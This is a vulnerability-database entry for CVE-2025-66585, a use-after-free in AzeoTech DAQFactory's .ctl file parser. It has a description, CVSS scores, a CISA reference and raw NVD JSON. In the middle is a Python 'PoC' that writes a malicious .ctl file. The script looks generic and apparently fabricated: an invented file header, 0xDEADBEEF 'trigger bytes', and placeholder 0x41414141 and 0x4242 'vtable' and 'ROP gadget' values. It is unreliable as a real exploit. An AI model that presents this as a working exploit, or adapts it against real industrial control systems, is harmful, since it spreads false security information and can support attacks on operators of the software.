Security Vulnerability Report

CVE-2025-66585

Published: 2025-12-11 21:15:57
Last Modified: 2026-01-02 20:04:10

Description

In AzeoTech DAQFactory release 20.7 (Build 2555), a Use After Free vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:* - VULNERABLE
AzeoTech DAQFactory 20.7 (Build 2555)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-66585 PoC - AzeoTech DAQFactory .ctl File UAF
# This PoC generates a malicious .ctl file to trigger Use After Free

import struct
import sys


def create_malicious_ctl():
    """Generate a malicious .ctl file that triggers UAF condition"""
    # DAQFactory .ctl file header structure
    header = b'DAQFactory Control File\x00'
    header += struct.pack('<I', 0x207)  # Version 20.7
    header += struct.pack('<I', 0x2555)  # Build 2555

    # Create heap grooming payload to trigger UAF
    # This creates conditions for use-after-free in memory parser
    payload = b'\x00' * 256  # Padding
    payload += struct.pack('<I', 0x41414141)  # Fake vtable pointer
    payload += struct.pack('<Q', 0x4242424242424242)  # ROP gadget address

    # Malicious channel definitions to trigger vulnerable code path
    malicious_section = bytearray()
    malicious_section += b'Channel\x00'
    malicious_section += b'MaliciousChannel\x00'

    # Trigger condition for UAF
    malicious_section += b'\xDE\xAD\xBE\xEF'  # Trigger bytes
    malicious_section += struct.pack('<I', 0x1000)  # Size field
    malicious_section += b'\x00' * 0x100  # Malformed data

    # Construct final .ctl file
    ctl_content = header + payload + malicious_section
    return ctl_content


def main():
    print("[*] CVE-2025-66585 PoC Generator")
    print("[*] Target: AzeoTech DAQFactory 20.7 (Build 2555)")
    print("[*] Vulnerability: Use After Free in .ctl file parser")

    # Generate malicious .ctl file
    malicious_ctl = create_malicious_ctl()

    # Write to file
    output_file = "CVE-2025-66585_malicious.ctl"
    with open(output_file, 'wb') as f:
        f.write(malicious_ctl)

    print(f"[+] Generated malicious .ctl file: {output_file}")
    print(f"[+] File size: {len(malicious_ctl)} bytes")
    print("[!] This file should be opened with DAQFactory 20.7 to trigger the vulnerability")


if __name__ == "__main__":
    main()

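References

https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03 (Third Party Advisory, US Government Resource)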

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66585", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:57.430", "lastModified": "2026-01-02T20:04:10.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In AzeoTech DAQFactory release 20.7 (Build 2555), a Use After Free vulnerability can be exploited to cause memory corruption while parsing specially crafted .ctl files. This could allow an attacker to execute code in the context of the current process."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.1", "matchCriteriaId": "5376DDEC-0BAA-465A-9EFB-62B3600336E8"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}